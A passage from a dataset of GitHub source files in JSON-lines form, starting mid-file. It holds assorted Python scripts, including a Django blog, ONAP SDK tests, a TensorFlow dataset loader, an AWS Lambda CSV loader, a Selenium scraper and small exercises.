= os.path.getctime(file_path)\n date_modified = os.path.getmtime(file_path)\n duration = video_stream.get(\"duration\")\n width = video_stream.get(\"width\")\n height = video_stream.get(\"height\")\n frame_rate = video_stream.get(\"avg_frame_rate\")\n audio_codec = audio_stream.get(\"codec_name\")\n audio_channels = audio_stream.get(\"channels\")\n audio_sample_rate = audio_stream.get(\"sample_rate\")\n \n video = Video(\n video_name = file_name,\n thumbnail_path = thumbnail_path,\n video_path = file_path,\n video_type = file_type,\n video_size = file_size,\n video_date_time = date_created,\n duration = duration,\n width = width,\n height = height,\n fps = frame_rate,\n audio_codec = audio_codec,\n audio_channel = audio_channels,\n audio_sample_rate = audio_sample_rate\n )\n # print\n # print(\"File name:\", file_name)\n # print(\"File type:\", file_type)\n # print(\"File size:\", file_size, \"bytes\")\n # print(\"Date created:\", datetime.fromtimestamp(date_created).strftime('%Y-%m-%d %H:%M:%S'))\n # print(\"Date last modified:\", datetime.fromtimestamp(date_modified).strftime('%Y-%m-%d %H:%M:%S'))\n # print(\"Duration:\", duration, \"seconds\")\n # print(\"Resolution:\", width, \"x\", height)\n # print(\"Frame rate:\", frame_rate, \"fps\")\n # print(\"Audio codec:\", audio_codec)\n # print(\"Audio channels:\", audio_channels)\n # print(\"Audio sample rate:\", audio_sample_rate, \"Hz\")\n # print(\"-----------------------------------\")\n","repo_name":"Team-Zeon/cyberx","sub_path":"ArgusAPI/API/scripts/videometadata.py","file_name":"videometadata.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10158576463","text":"from math import sqrt \n\n\n# Fonction qui permet de determiner un rectangle dans un polygone \ndef rec(A):\n AB=sqrt((A[2]-A[0])**2+(A[3]-A[1])**2)\n AD=sqrt((A[6]-A[0])**2+(A[7]-A[1])**2)\n BC=sqrt((A[4]-A[2])**2+(A[5]-A[3])**2)\n DC=sqrt((A[4]-A[6])**2+(A[5]-A[7])**2)\n VAB=A[2]-A[0],A[3]-A[1]\n VAD=A[6]-A[0],A[7]-A[1]\n VEC=VAB[0]*VAD[0]+VAB[1]*VAD[1]\n \n if (((AB==DC) or (AD==BC) and (VEC==0))):\n return {\"Rectangle\":True}\n\n else:\n return {\"Rectangle\":False}\n\nprint(rec(A=[1,2,3,2,1,1,3,1]))\n\n","repo_name":"Manoe2006/ann-e-sco-2022-2023","sub_path":"devoir_maison_nsi.py/func_rectangle.py","file_name":"func_rectangle.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12402770833","text":"from logging import WARNING, INFO, DEBUG\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\n# Set the logging level.\nlogging_level = DEBUG\n\n# Configure the Chrome settings.\nuser_data_dir = r\"C:\\works\\_tools\\selenium\\chrome\\User Data\"\nprofile_dir = r\"Default\"\ndownload_dir = r\"C:\\works\\_tools\\selenium\\chrome\\Downloads\"\n\n# Define the sequences of Ausrine.\nsequences = [\n {\"get\": {\"url\": \"https://www.google.com/?hl=en\"}},\n {\"click\": {\"by\": By.XPATH, \"value\": \"//textarea[@title='Search']\"}},\n {\"send_keys\": {\"by\": By.XPATH, \"value\": \"//textarea[@title='Search']\", \"text\": \"iphone\"}},\n {\"send_keys\": {\"by\": By.XPATH, \"value\": \"//textarea[@title='Search']\", \"text\": \" 14\", \"append\": True}},\n {\"send_keys\": {\"by\": By.XPATH, \"value\": \"//textarea[@title='Search']\", \"text\": Keys.ENTER}},\n]\n","repo_name":"naoyoshinori/ausrine_example","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72616264808","text":"from django.shortcuts import render, redirect\nfrom django.template.loader import render_to_string\nfrom django.http import HttpResponse, HttpResponseRedirect\n\n# Create your views here.\nfrom .models import Post\n\n\ndef post_list(request):\n # html = render_to_string('blog/post_list.html')\n # posts = Post.objects.all()\n #\n # result = 'index
    '\n #\n # for post in posts:\n # result += f'-{post}
    '\n #\n # # return HttpResponse(result)\n # return HttpResponse(result)\n # render는 주어진 1,2 번째 인수를 사용해서\n # 1번째인수 : HttpRequests 인스턴스\n # 2번째인수 : 문자열(TEMPLATE['DIRS']를 기준으로 탐색할 템플릿 파일의 경로\n # return render\n posts = Post.objects.all().order_by('-id')\n context = {\n 'posts': posts,\n }\n return render(request, 'blog/post_list.html', context)\n\n\ndef post_detail(requset, post_id):\n post = Post.objects.get(id=post_id)\n context = {\n 'post': post,\n }\n\n # post_detail view function 이 ��바르게 동작하는 html을 작성해 오세요\n # post_detail.html 파일을 만들어서 post.id 값을 할당하여 해당 페이지로 넘겨주기\n return render(requset, 'blog/post_detail.html', context)\n\n\ndef post_create(request):\n # title\n # text\n # title = Post.objects.create(title=)\n # text = Post.objects.create(text=)\n context = {\n\n }\n print(request.POST.get('title'))\n print(request.POST.get('content'))\n if request.method == 'POST':\n # request의 method 값이 'POST' 일 경우\n # request.POST에 있는 title, text 값과\n # request.user 에 있는 User 인스턴스 속성을 사용해서\n # 세 post 인스턴스를 생성\n # HttpResponse를 사용해 새로생성된 인스턴스의 id, title, text 정보를 출력\n post = Post.objects.create(\n author=request.user,\n title=request.POST['title'],\n text=request.POST['content'],\n\n )\n # HTTP Redirection을 보낼 URL\n # http://localhost:8000/\n return redirect('post-list')\n else:\n return render(request, 'blog/post_create.html', context)\n\n\ndef post_delete(request, post_id):\n if request.method == 'POST':\n post = Post.objects.get(id=post_id)\n post.delete()\n return redirect('post-list')\n\n\ndef post_edit(request, post_id):\n post = Post.objects.get(id=post_id)\n\n if request.method == 'POST':\n pass\n # 글을 수정하기\n # 1. 수정할 내용(title, text)을 가져온다\n # 2. 수정할 Post 인스턴스 명시\n # 3. 해당하는 Post 인스턴스의 title, text 를 수정해서 DB에 저장\n # 4. post_detail로 이동\n title = request.POST['title']\n text = request.POST['content']\n\n # 수정해서 DB에 저장\n post.title = title\n post.text = text\n post.save()\n # return HttpResponseRedirect('/{}/'.format(post_id))\n # post-detail에 해당하는 URL 을 만들어 내려면,\n # (\\d+)에 해당하는 부분을 채울 값이 함께 필요\n return redirect('post-detail', post_id)\n # POST 방식이라면 어차피 위에서 return 되므로ㅓ else문 생략\n context = {\n 'post':post,\n }\n return render(request, 'blog/post_edit.html', context)\n","repo_name":"bear-engineer/Python-django-tutorial","sub_path":"app/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16535934417","text":"from unittest import mock\n\nfrom onapsdk.aai.cloud_infrastructure import Complex\nfrom onapsdk.aai.cloud_infrastructure import CloudRegion\n\n\nCOMPLEXES = {\n \"complex\":[\n {\n \"physical-location-id\":\"integration_test_complex\",\n \"data-center-code\":\"1234\",\n \"complex-name\":\"integration_test_complex\",\n \"identity-url\":\"\",\n \"resource-version\":\"1588244056133\",\n \"physical-location-type\":\"\",\n \"street1\":\"\",\n \"street2\":\"\",\n \"city\":\"\",\n \"state\":\"\",\n \"postal-code\":\"\",\n \"country\":\"\",\n \"region\":\"\",\n \"latitude\":\"\",\n \"longitude\":\"\",\n \"elevation\":\"\",\n \"lata\":\"\",\n \"time-zone\":\"\",\n \"data-owner\":\"\",\n \"data-source\":\"\",\n \"data-source-version\":\"\"\n }\n ]\n}\n\n\nCOMPLEXES_COUNT = {\n \"results\":[\n {\n \"complex\":12\n }\n ]\n}\n\n\n@mock.patch.object(Complex, \"send_message\")\ndef test_complex(mock_send_message):\n cmplx = Complex(name=\"test_complex_name\",\n physical_location_id=\"test_location_id\",\n resource_version=\"1234\")\n assert cmplx.name == \"test_complex_name\"\n assert cmplx.physical_location_id == \"test_location_id\"\n assert cmplx.url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n\n cmplx2 = Complex.create(name=\"test_complex_name\",\n physical_location_id=\"test_location_id\")\n mock_send_message.assert_called_once()\n assert cmplx2.name == \"test_complex_name\"\n assert cmplx2.physical_location_id == \"test_location_id\"\n assert cmplx2.url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n method, _, url = mock_send_message.call_args[0]\n assert method == \"PUT\"\n assert url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n\n@mock.patch.object(Complex, \"send_message\")\ndef test_complex_update(mock_send_message):\n cmplx1 = Complex.update(name=\"test_complex_name\",\n physical_location_id=\"test_location_id\")\n mock_send_message.assert_called_once()\n assert cmplx1.name == \"test_complex_name\"\n assert cmplx1.physical_location_id == \"test_location_id\"\n assert cmplx1.url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n method, _, url = mock_send_message.call_args[0]\n assert method == \"PATCH\"\n assert url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n\n\n@mock.patch.object(Complex, \"send_message_json\")\ndef test_complex_get_all(mock_send_message_json):\n mock_send_message_json.return_value = COMPLEXES\n complexes = list(Complex.get_all())\n assert len(complexes) == 1\n cmplx = complexes[0]\n assert cmplx.name == \"integration_test_complex\"\n assert cmplx.physical_location_id == \"integration_test_complex\"\n\n\n@mock.patch.object(CloudRegion, \"add_relationship\")\n@mock.patch.object(CloudRegion, \"relationships\", new_callable=mock.PropertyMock)\n@mock.patch.object(CloudRegion, \"delete_relationship\")\ndef test_cloud_region_link_to_complex(mock_delete_relationship, mock_relationships, mock_add_rel):\n \"\"\"Test Cloud Region linking with Complex.\n\n Test Relationship object creation\n \"\"\"\n cloud_region = CloudRegion(cloud_owner=\"test_cloud_owner\",\n cloud_region_id=\"test_cloud_region\",\n orchestration_disabled=True,\n in_maint=False)\n cmplx = Complex(name=\"test_complex_name\",\n physical_location_id=\"test_location_id\",\n resource_version=\"1234\")\n cloud_region.link_to_complex(cmplx)\n mock_add_rel.assert_called_once()\n relationship = mock_add_rel.call_args[0][0]\n assert relationship.related_to == \"complex\"\n assert relationship.related_link == (f\"https://aai.api.sparky.simpledemo.onap.org:30233/aai/\"\n f\"v27/cloud-infrastructure/complexes/complex\"\n f\"/test_location_id\")\n assert len(relationship.relationship_data) == 1\n\n mock_relationships.return_value = [relationship]\n cloud_region.unlink_complex(cmplx)\n mock_delete_relationship.assert_called_once_with(relationship)\n\n\n@mock.patch.object(Complex, \"send_message_json\")\ndef test_complex_get_by_physical_location_id(mock_send_message_json):\n \"\"\"Test complex get_by_physical_location_id url creation.\"\"\"\n Complex.get_by_physical_location_id(\"test\")\n mock_send_message_json.assert_called_once_with(\n \"GET\",\n \"Get complex with physical location id: test\",\n f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n f\"complexes/complex/test\"\n )\n\n@mock.patch.object(Complex, \"send_message\")\ndef test_complex_delete(mock_send_message):\n cmplx = Complex(physical_location_id=\"test_location_id\",\n resource_version=\"1234\")\n cmplx.delete()\n mock_send_message.assert_called_once_with(\n \"DELETE\",\n \"Delete test_location_id complex\",\n f\"{cmplx.url}?resource-version={cmplx.resource_version}\"\n )\n\n@mock.patch.object(Complex, \"send_message_json\")\ndef test_complex_count(mock_send_message_json):\n mock_send_message_json.return_value = COMPLEXES_COUNT\n assert Complex.count() == 12\n","repo_name":"onap/integration-python-onapsdk","sub_path":"tests/test_aai_complex.py","file_name":"test_aai_complex.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"39752904711","text":"import sys\nsys.path.append('..')\nfrom utils import param_file_access\nimport tensorflow as tf\n\nslim = tf.contrib.slim\ndataset = slim.dataset\ntfexample_decoder = slim.tfexample_decoder\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\n\n\n\n_ITEMS_TO_DESCRIPTIONS = {\n 'image': 'A color image of varying height and width.',\n 'labels_class': ('A semantic segmentation label whose size matches image.'\n 'Its values range from 0 (background) to num_classes.'),\n}\n\n\n\n\n\ndef get_dataset(list_path, tfrecord_path, label_map_path, ignore_label=255):\n \"\"\"Gets an instance of slim Dataset.\n\n Args:\n list_path: Path of sample list file.\n tfrecord_path: Tfrecord file path corresponding to list.\n label_map_path: Path of sample label map file.\n\n Returns:\n An instance of slim Dataset.\n\n \"\"\"\n \n num_samples = len(param_file_access.get_txt_params(list_path))\n num_classes = len(param_file_access.get_json_params(label_map_path))\n\n\n # Specify how the TF-Examples are decoded.\n keys_to_features = {\n 'image/encoded': tf.FixedLenFeature(\n (), tf.string, default_value=''),\n 'image/filename': tf.FixedLenFeature(\n (), tf.string, default_value=''),\n 'image/format': tf.FixedLenFeature(\n (), tf.string, default_value='jpeg'),\n 'image/height': tf.FixedLenFeature(\n (), tf.int64, default_value=0),\n 'image/width': tf.FixedLenFeature(\n (), tf.int64, default_value=0),\n 'image/segmentation/class/encoded': tf.FixedLenFeature(\n (), tf.string, default_value=''),\n 'image/segmentation/class/format': tf.FixedLenFeature(\n (), tf.string, default_value='png'),\n }\n items_to_handlers = {\n 'image': tfexample_decoder.Image(\n image_key='image/encoded',\n format_key='image/format',\n channels=3),\n 'image_name': tfexample_decoder.Tensor('image/filename'),\n 'height': tfexample_decoder.Tensor('image/height'),\n 'width': tfexample_decoder.Tensor('image/width'),\n 'labels_class': tfexample_decoder.Image(\n image_key='image/segmentation/class/encoded',\n format_key='image/segmentation/class/format',\n channels=1),\n }\n\n decoder = tfexample_decoder.TFExampleDecoder(\n keys_to_features, items_to_handlers)\n\n return dataset.Dataset(\n data_sources=tfrecord_path,\n reader=tf.TFRecordReader,\n decoder=decoder,\n num_samples=num_samples,\n items_to_descriptions=_ITEMS_TO_DESCRIPTIONS,\n num_classes=num_classes,\n ignore_label=ignore_label,\n name='pascal_voc_seg',\n multi_label=True)\n","repo_name":"KoapT/tf_train","sub_path":"projects/deeplab_v3plus/src/datasets/segmentation_dataset.py","file_name":"segmentation_dataset.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41967530560","text":"import math \ndef Calculate_Distance_Nodes(lat01,lat02,long01,long02):\n R=6378.137 #km\n lat01=float(lat01)\n lat02=float(lat02)\n long01=float(long01)\n long02=float(long02)\n dLat=(lat02-lat01)*(math.pi/180)\n dLong=(long02-long01)*(math.pi/180)\n Lat01torad=lat01*math.pi/180\n Lat02torad=lat02*math.pi/180\n Value_a=math.sin(dLat/2)*math.sin(dLat/2)+math.cos(Lat01torad)*math.cos(Lat02torad)*math.sin(dLong/2)*math.sin(dLong/2)\n Value_b=2*math.atan(math.sqrt(Value_a)/math.sqrt(1-Value_a))\n Distance=R*Value_b\n\n return Distance\ndef Calculate_Distance_Way(latlong): #takes 2 nodes same time and calulate all ways\n Distance_ways = 0\n\n for i in range(1, len(latlong)):\n a = latlong[i - 1]\n b = latlong[i]\n\n lat1 = a['lat']\n lat2 = b['lat']\n long1 = a['long']\n long2 = b['long']\n\n Distance2nodes = Calculate_Distance_Nodes(lat1, lat2, long1, long2)\n Distance_ways += Distance2nodes\n\n return Distance_ways","repo_name":"TrangNhaBui/Openstreetmap-Length-Calculation","sub_path":"Length_Calculation.py","file_name":"Length_Calculation.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42180748134","text":"from turtle import Turtle\n\n\nclass Paddle(Turtle):\n def __init__(self, position=\"right\"):\n super().__init__()\n self.color(\"white\")\n self.penup()\n self.shape(\"square\")\n self.shapesize(stretch_wid=5, stretch_len=1)\n self.speed(\"fastest\")\n if position == \"left\":\n self.goto(-350, 0)\n else:\n self.goto(350, 0)\n\n def up(self):\n if self.ycor() < 240:\n self.goto(self.xcor(), self.ycor() + 20)\n\n def down(self):\n if self.ycor() > -240:\n self.goto(self.xcor(), self.ycor() - 20)\n\n\n","repo_name":"Aineken/python-projects","sub_path":"days/day 22 - arcade game/paddle.py","file_name":"paddle.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"636786151","text":"import boto3\nimport csv\nimport os\n\ns3_client = boto3.client('s3')\ndynamodb = boto3.resource('dynamodb')\n\ndef lambda_handler(event, context):\n bucket_name = 'your-bucket-name' # Replace with your own bucket name\n file_name = 'your-file-name.csv' # Replace with your own file name\n table_name = 'your-table-name' # Replace with your own table name\n\n # Download the CSV file from S3\n s3_client.download_file(bucket_name, file_name, '/tmp/' + file_name)\n\n # Open the CSV file and parse the data\n with open('/tmp/' + file_name, 'r') as csv_file:\n csv_reader = csv.reader(csv_file)\n next(csv_reader) # Skip the header row\n for row in csv_reader:\n item = {\n 'id': row[0],\n 'name': row[1],\n 'description': row[2],\n 'price': row[3]\n }\n \n # Add the item to the DynamoDB table\n table = dynamodb.Table(table_name)\n table.put_item(Item=item)\n\n # Clean up the temporary file\n os.remove('/tmp/' + file_name)\n\n return {\n 'statusCode': 200,\n 'body': 'Data loaded successfully to DynamoDB table'\n }\n","repo_name":"felvinerepo/MicroService_Team_A","sub_path":"newfileMS1.py","file_name":"newfileMS1.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71513461607","text":"import SpellShop\nclass Character():\n def __init__(self):\n self.PlayerName = \"Player Name\"\n self.CharName = \"Character Name\"\n self.race = \"DWARF\"\n self.maxhealth = 20\n self.health = 20\n self.gold = 100\n # 1 = Anytime\n # 2 = Movement\n # 3 = Basic Attack\n # 4 = Spell\n self.actions = [3,4,2,1]\n self.stats = []\n self.spells = []\n self.pos_Race = [\"DWARF\", \"ELF\", \"GNOME\",\"CROWN\", \"BEAST\", \"MANDOZIAN\", \"CATHARINES\", \"ENORKANS\", \"XENOKIAN\", \"VESTIAN\", \"SWORD\", \"HERGSOIGISE\"]\n def ChangePlayerName(self, NewName):\n self.PlayerName = NewName\n def ChangeCharacterName(self, NewName):\n self.CharacterName = NewName\n def ChangeHealth(self, amount):\n self.health = self.health + amount\n if self.health > self.maxhealth:\n self.health = self.maxhealth\n if self.health <= 0:\n self.health = 0\n def ChangeRace(self):\n current = self.pos_Race.index(self.race)\n if current+1 > len(self.pos_Race)-1:\n self.race = self.pos_Race[0]\n else:\n self.race = self.pos_Race[current+1]\n def ChangeAction(self, space):\n self.actions[space] = self.actions[space]+1\n if self.actions[space] >4:\n self.actions[space] = 1\n def ChangeGold(self, amount):\n self.gold = self.gold + amount\n def AddSpell(self, SpellName):\n Spells = SpellShop.Shop()\n for i in range(0,len(Spells.SpellList)):\n if Spells.SpellList[i][0] == SpellName:\n self.spells.append(Spells.SpellList[i])\n return None\n def RemoveSpell(self, SpellName):\n for i in range(0,len(self.spells)):\n if self.spells[i][0] == SpellName:\n del self.spells[i]\n return None\n \n","repo_name":"Ghureg/VDND","sub_path":"CharTracker/libs/Char.py","file_name":"Char.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41470130726","text":"from .EsController import EsController\n\n\nclass EsDumper:\n indices = {\n \"latvia\": {\n \"consulate\": \"latv_cons\",\n \"visaac\": \"latv_visaac\",\n \"news\": \"latv_news\",\n },\n \"poland\": {\"consulate\": \"pol_cons\", \"visaac\": \"pol_visaac\", \"news\": \"pol_news\"},\n \"lithuania\": {\n \"consulate\": \"lith_cons\",\n \"visaac\": \"lith_visaac\",\n \"news\": \"lith_news\",\n },\n \"thailand\": {\n \"consulate\": \"thai_cons\",\n \"visaac\": \"thai_visaac\",\n \"news\": \"thai_news\",\n },\n \"spain\": {\n \"consulate\": \"spain_cons\",\n \"visaac\": \"spain_visaac\",\n \"news\": \"spain_news\",\n },\n }\n\n CONSULATE = \"consulate\"\n VISA_CENTER = \"visaac\"\n NEWS = \"news\"\n\n def __init__(self):\n self.es_controller = EsController()\n\n def add_consulates(self, consulates, index_name):\n for index, consulate in enumerate(consulates):\n self.es_controller.add_data(\n index_name,\n index + 1,\n {\n \"address\": consulate[\"ADRESS\"],\n \"email\": consulate[\"EMAIL\"],\n \"telephone1\": consulate[\"PHONE_NUMBER_1\"],\n \"telephone2\": consulate[\"PHONE_NUMBER_1\"],\n \"worktime\": consulate[\"WORKING_HOURS\"],\n },\n )\n\n def add_visa_centers(self, visa_centers, index_name):\n for index, visa_center in enumerate(visa_centers):\n self.es_controller.add_data(\n index_name,\n index + 1,\n {\n \"address\": visa_center[\"ADRESS\"],\n \"email\": visa_center[\"EMAIL\"],\n \"issue_worktime\": visa_center[\"ISSUE_WORKING_HOURS\"],\n \"apply_worktime\": visa_center[\"APPLY_WORKING_HOURS\"],\n \"telephone1\": visa_center[\"PHONE_NUMBER\"],\n \"telephone2\": \"null\",\n },\n )\n\n def add_news(self, news, index_name):\n for index, news_item in enumerate(news):\n self.es_controller.add_data(\n index_name,\n index + 1,\n {\n \"date\": news_item[\"DATE\"],\n \"title\": news_item[\"TITLE\"],\n \"body\": news_item[\"BODY\"],\n \"link\": news_item[\"LINK\"],\n },\n )\n\n def init_indices(self, data, country):\n [\n self.es_controller.delete_index(index)\n for index in [\n EsDumper.indices[country][\"consulate\"],\n EsDumper.indices[country][\"visaac\"],\n EsDumper.indices[country][\"news\"],\n ]\n ]\n self.add_consulates(data[\"CONSULATE\"], EsDumper.indices[country][\"consulate\"])\n self.add_visa_centers(data[\"VISAAC\"], EsDumper.indices[country][\"visaac\"])\n self.add_news(data[\"NEWS\"], EsDumper.indices[country][\"news\"])\n","repo_name":"svyatjes/visa_app","sub_path":"flask_app/es/EsDumper.py","file_name":"EsDumper.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35091586588","text":"import csv\nimport datetime\nimport os\nimport traceback\n\nimport undetected_chromedriver as uc\nfrom selenium.webdriver.common.by import By\nfrom seleniumbase import page_actions\n\nfrom models import BorderCapture, Camera, database\nfrom send_msg import logger, send_to_qu\nfrom utils import retry\n\nRETRY_ATTEMTPS = 5\n\n\n@retry(retries=RETRY_ATTEMTPS)\ndef fetch_image(url, location):\n\n if not url:\n url = os.environ[\"URL\"]\n if not location:\n location = os.environ[\"URL_LOCATION\"]\n\n options = uc.ChromeOptions()\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--headless=chrome\")\n options.add_argument(\"--disable-gpu\")\n options.add_argument(\"--disable-dev-shm-usage\")\n driver = uc.Chrome(options=options, driver_executable_path=\"./chromedriver\")\n\n try:\n try:\n # Check the database connection before fetching the image\n database.connect(reuse_if_open=True)\n except:\n logger.error(traceback.format_exc(limit=1))\n raise Exception(\"Database connection can not be established.\")\n\n driver.get(url)\n\n page_actions.wait_for_element(driver, selector=\"videoImage\", by=By.ID)\n\n image = driver.find_element(By.ID, \"videoImage\")\n image_name = str(int(datetime.datetime.utcnow().timestamp())) + \".png\"\n\n image_location = location + \"/\" + image_name\n\n # Save image to folder with a relative location\n image.screenshot(\"./data/\" + image_location)\n\n assert image_name in os.listdir(\"./data/\" + location + \"/\")\n logger.info(\n f\"[parser] Successfuly fetched an image - {image_name} at {location}!\"\n )\n\n camera_id = Camera.get_or_create(location_name=location)[0].id\n\n model = BorderCapture.create(\n camera_id=camera_id,\n image_path=os.getcwd() + \"/data/\" + image_location,\n )\n database.close()\n except Exception as e:\n driver.quit()\n raise e\n driver.quit()\n # ID is of type UUID, thus conversion req.\n return str(model.id)\n\n\nif __name__ == \"__main__\":\n\n with open(\"urls.csv\", \"r\") as f:\n\n sources = csv.reader(f)\n\n for row in sources:\n\n url, location = row\n\n image_id = fetch_image(url, location)\n send_to_qu(image_id)\n","repo_name":"kturaevv/border_guard","sub_path":"parser/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18282769307","text":"import socket\r\nfrom random import randint\r\n\r\nClientSocket = socket.socket()\r\nhost = '127.0.0.1'\r\nport = 1233\r\n\r\ndef Convert(string):\r\n list1=[]\r\n list1[:0]=string\r\n return list1\r\n\r\nprint('Waiting for connection')\r\ntry:\r\n ClientSocket.connect((host, port))\r\nexcept socket.error as e:\r\n print(str(e))\r\n\r\nResponse = ClientSocket.recv(1024)\r\nprint(Response.decode('utf-8'))\r\n\r\nClientSocket.send(str.encode('Hello from Party 1'))\r\nResponse = ClientSocket.recv(1024)\r\nprint(Response.decode('utf-8'))\r\ndata1 = ClientSocket.recv(4096)\r\nClientSocket.send('OK'.encode())\r\ndata2 = ClientSocket.recv(4096)\r\nClientSocket.send('OK'.encode())\r\nnum1 = ClientSocket.recv(1024)\r\nClientSocket.send('OK'.encode())\r\ndata3 = ClientSocket.recv(4096)\r\n\r\nx1 = []\r\ny1 = []\r\nx2 = []\r\n\r\ndata1 = data1.decode('utf-8')\r\nfor i in range(len(data1)):\r\n if(data1[i]!= ' ' and data1[i]!= ',' and data1[i]!= '[' and data1[i]!= ']' ):\r\n x1.append(int(data1[i]))\r\nprint(x1)\r\n \r\n\r\n\r\n# Convert decoded data into list\r\n\r\ndata2 = data2.decode('utf-8')\r\nfor i in range(len(data2)):\r\n if(data2[i]!= ' ' and data2[i]!= ',' and data2[i]!= '[' and data2[i]!= ']' ):\r\n y1.append(int(data2[i]))\r\nprint(y1)\r\n\r\n\r\ndata3 = data3.decode('utf-8')\r\nfor i in range(len(data3)):\r\n if(data3[i]!= ' ' and data3[i]!= ',' and data3[i]!= '[' and data3[i]!= ']' ):\r\n x2.append(int(data3[i]))\r\nprint(x2)\r\n\r\nstrings1 = num1.decode('utf8')\r\n#get the num\r\nr = int(strings1)\r\n\r\nprint(\"x1 = \", x1, \"y1 = \", y1, \"x2 = \", x2, \"r = \",r)\r\n\r\nprint(len(x1), len(x2), len(y1))\r\na = []\r\n\r\n\r\nfor i in range(r):\r\n x = x1[i]^x2[i]\r\n a.append(x)\r\n\r\nprint(\"a = \", a)\r\n\r\nClientSocket.close()\r\n\r\n","repo_name":"anjali13s/CSP_Project","sub_path":"optimally fair implementation/client1_moran.py","file_name":"client1_moran.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7082445899","text":"# -*- coding: utf-8 -*-\nfrom typing import Tuple, Union\nfrom typing import Callable\nimport pandas as pd\nimport numpy as np\nfrom src.si.data.dataset import Dataset\nfrom src.si.statisics.f_classification import f_classification\n\n\nclass SelectPercentile:\n\n def __init__(self, percentile: float = 0.25, score_func: Callable = f_classification) -> None:\n self.score_func = score_func\n self.percentile = percentile\n #parametros estimados\n self.F = None\n self.p = None\n\n def fit(self, dataset: Dataset):\n '''\n Estimates the F and p for each feature using the scoring_func\n\n :param dataset: a given dataset\n :return: self\n '''\n\n #estima o F e p para cada feature usando a scoring_func ;\n # retorna o self (ele próprio)\n\n self.F, self.p = self.score_func(dataset)\n\n return self\n\n def transform(self, dataset: Dataset) -> Dataset:\n '''\n Selects the features with the highest F value up to the indicated percentile.\n (for a dataset with 10 features and a 50% percentile, the transform should select\n the 5 features with higher F value)\n\n :param dataset: a given dataset\n :return: dataset\n '''\n\n #seleciona as features com valor de F mais alto até ao\n # percentil indicado. Por exemplo, para um dataset com 10 features e um\n # percentil de 50%, o teu transform deve selecionar as 5 features com valor\n # de F mais alto\n\n #tamanho do dataset\n length = len(dataset.features)\n #tamanho com percentile\n percentile_mask = int(length * self.percentile)\n\n #multiplicação ao longo do eixo /// retorna uma matriz de índices\n ## quanto maior o F, a diferença vai ser mais significativa por isso selecionamos o maior f\n\n # retorna por ordem crescente os index do F,\n #valores mais baixos/vai buscar ao contrario as 10 melhores com o '-'\n idxs = np.argsort(self.F)[-percentile_mask:]\n features = np.array(dataset.features)[idxs]\n\n return Dataset(X=dataset.X[:, idxs], y=dataset.y, features=list(features), label=dataset.label)\n\n def fit_transform(self, dataset: Dataset) -> Dataset:\n '''\n Runs the fit and then the transform\n\n :param dataset: a given dataset\n :return: transformed dataset\n '''\n self.fit(dataset)\n return self.transform(dataset)\n\n\nif __name__ == '__main__':\n percentile = SelectPercentile(0.50)\n dataset = Dataset(X=np.array([[0, 1, 2, 3],\n [0, 2, 4, 6],\n [1, 3, 5, 7]]),\n y=np.array([0, 1, 2]),\n features=[\"f1\", \"f2\", \"f3\", \"f4\"],\n label=\"y\")\n percentile = percentile.fit_transform(dataset)\n print(dataset.features)\n print(percentile.features)","repo_name":"carinaa9/si","sub_path":"src/si/feature_selection/select_percentile.py","file_name":"select_percentile.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"pt","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"8798827229","text":"N = int(input())\na = list(map(int,input().split()))\nmod = 998244353\ndp = [[0]*10 for _ in range(N)]\ndp[0][a[0]] = 1\nfor i in range(1,N):\n for j in range(10):\n for k in range(10):\n if (a[i]+k)%10 == j:\n dp[i][j] += dp[i-1][k]%mod\n if (a[i]*k)%10 == j:\n dp[i][j] += dp[i-1][k]%mod\nfor i in range(10):\n print(dp[-1][i]%mod)\n# 